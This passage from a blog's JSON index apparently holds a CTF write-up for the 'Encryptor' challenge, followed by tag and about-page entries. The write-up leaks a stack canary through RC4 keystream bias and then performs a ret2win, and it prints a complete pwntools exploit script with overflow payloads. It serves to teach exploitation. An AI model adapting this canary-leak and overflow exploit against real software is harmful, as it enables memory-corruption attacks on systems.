offset, we can cause RC4 to encrypt arbitrary stack bytes, including the stack canary.\nRC4 keystream bias # RC4 is a stream cipher that generates a keystream K and encrypts via XOR:\n$$ C = P \\oplus K $$\nRC4 is known to exhibit statistical biases in its early output bytes. 
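How strong is that bias? A short standalone simulation (a sketch, not part of the exploit) measures how often the second keystream byte is zero across fresh random keys:

```python
import random

def rc4_keystream(key, n):
    # Key-scheduling algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # Pseudo-random generation algorithm (PRGA)
    i = j = 0
    out = []
    for _ in range(n):
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % 256])
    return out

rng = random.Random(1337)  # fixed seed for reproducibility
trials = 20000
zeros = sum(
    rc4_keystream(bytes(rng.randrange(256) for _ in range(16)), 2)[1] == 0
    for _ in range(trials)
)
print(zeros / trials)  # well above the uniform 1/256
```

The measured rate comes out roughly double what a uniform keystream would give, which is exactly the signal the canary recovery loop averages over.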
In particular, the second keystream byte is biased toward zero with probability:\n$$ \\Pr[K_2 = 0] = \\frac{1}{128} $$\ninstead of the uniform 1/256.\nThis enables a distinguishing attack: if the plaintext byte is constant across encryptions with fresh keys, the most frequent ciphertext byte converges to the plaintext value.\nCanary leakage via bias # We exploit this by:\nForcing RC4 to encrypt a chosen stack byte Aligning that byte with keystream index 2 Repeating encryption with fresh random keys Taking the most frequent ciphertext byte On amd64, the first byte of the stack canary is always 0x00, so only the remaining 7 bytes need to be recovered.\nCanary recovery script # Below is the core logic used to recover the canary one byte at a time.\nfrom pwn import * elf = ELF(\u0026#34;encryptor\u0026#34;) p = process(elf.path) p.recvline() win_addr = int(p.recvline().split(b\u0026#34;at \u0026#34;)[1][2:-1], 16) canary = [0x00] for i in range(1, 8): counts = {j: 0 for j in range(256)} # craft input so the RC4 plaintext pointer lands on canary[i] payload = (b\u0026#34;\\x00\u0026#34; * 240 + p8(0xf7 + i))[:241] p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1\u0026#34;) p.sendafter(b\u0026#34;\u0026gt;\u0026#34;, payload) while True: p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;2\u0026#34;) ct = bytes.fromhex( p.recvline().split(b\u0026#34;Encrypted: \u0026#34;)[1].decode() ) counts[ct[1]] += 1 best = max(counts, key=counts.get) second = sorted(counts.values())[-2] if counts[best] - second \u0026gt; 5: canary.append(best) break canary = bytes(canary) log.success(f\u0026#34;canary = {canary.hex()}\u0026#34;) Notes:\nOnly the least significant byte of the offset is controlled Keystream index 2 is targeted because its bias is strongest The threshold is heuristic and may need tuning on remote Example output:\ncanary = 6f28c7b1a4923e00 ret2win # The binary contains a hidden menu option:\nif (menu_choice == 1337) { printf(\u0026#34;Leaving already? 
Enter feedback:\\n\u0026gt; \u0026#34;); fgets(local_108, 288, stdin); } This reads 288 bytes into a 240-byte buffer, allowing full control of the return address.\nWith the stack canary known and win() already leaked, exploitation is trivial.\nFinal payload # p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1337\u0026#34;) p.sendlineafter( b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;A\u0026#34; * 0xf8 + canary + b\u0026#34;B\u0026#34; * 8 + p64(win_addr) ) p.interactive() Successful execution:\nEPT{test_flag} Final solve script # Below is the consolidated exploit used locally and remotely.\nfrom pwn import * elf = ELF(\u0026#34;encryptor\u0026#34;) p = process(elf.path) p.recvline() win_addr = int(p.recvline().split(b\u0026#34;at \u0026#34;)[1][2:-1], 16) canary = [0x00] for i in range(1, 8): counts = {j: 0 for j in range(256)} payload = (b\u0026#34;\\x00\u0026#34; * 240 + p8(0xf7 + i))[:241] p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1\u0026#34;) p.sendafter(b\u0026#34;\u0026gt;\u0026#34;, payload) while True: p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;2\u0026#34;) ct = bytes.fromhex( p.recvline().split(b\u0026#34;Encrypted: \u0026#34;)[1].decode() ) counts[ct[1]] += 1 best = max(counts, key=counts.get) second = sorted(counts.values())[-2] if counts[best] - second \u0026gt; 5: canary.append(best) break canary = bytes(canary) p.sendlineafter(b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;1337\u0026#34;) p.sendlineafter( b\u0026#34;\u0026gt;\u0026#34;, b\u0026#34;A\u0026#34; * 0xf8 + canary + b\u0026#34;B\u0026#34; * 8 + p64(win_addr) ) print(p.recvall().decode()) Takeaways # RC4 remains exploitable even outside traditional network protocols Single-byte overwrites are often sufficient to defeat stack canaries Cryptographic bias can be weaponized as an information leak Disabling functionality does not remove its security impact This challenge is a good example of cryptographic weaknesses amplifying memory corruption rather than 
replacing it.\n","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/ctfs/ept-25/encryptor/","section":"CTFs","summary":"Leaking a stack canary using RC4 keystream bias, then ret2win.","title":"Encryptor","type":"ctfs"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/ctfs/ept-25/","section":"CTFs","summary":"","title":"Equinor CTF 2025","type":"ctfs"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/rc4/","section":"Tags","summary":"","title":"Rc4","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/stack-canary/","section":"Tags","summary":"","title":"Stack-Canary","type":"tags"},{"content":"","date":"8 November 2025","externalUrl":null,"permalink":"/writeups/tags/stream-cipher/","section":"Tags","summary":"","title":"Stream-Cipher","type":"tags"},{"content":"Hey, I\u0026rsquo;m Frederik. I publish CTF writeups and technical notes here.\nFocus\nBinary exploitation, crypto, reverse engineering, and web security CTFs, security research, and writeups worth sharing ","externalUrl":null,"permalink":"/writeups/about/","section":"About","summary":"Who I am, where to find me, and what I enjoy breaking.","title":"About","type":"about"},{"content":"","externalUrl":null,"permalink":"/writeups/topics/ctfs/","section":"Topics","summary":"Writeups grouped by competition.","title":"CTFs","type":"topics"}]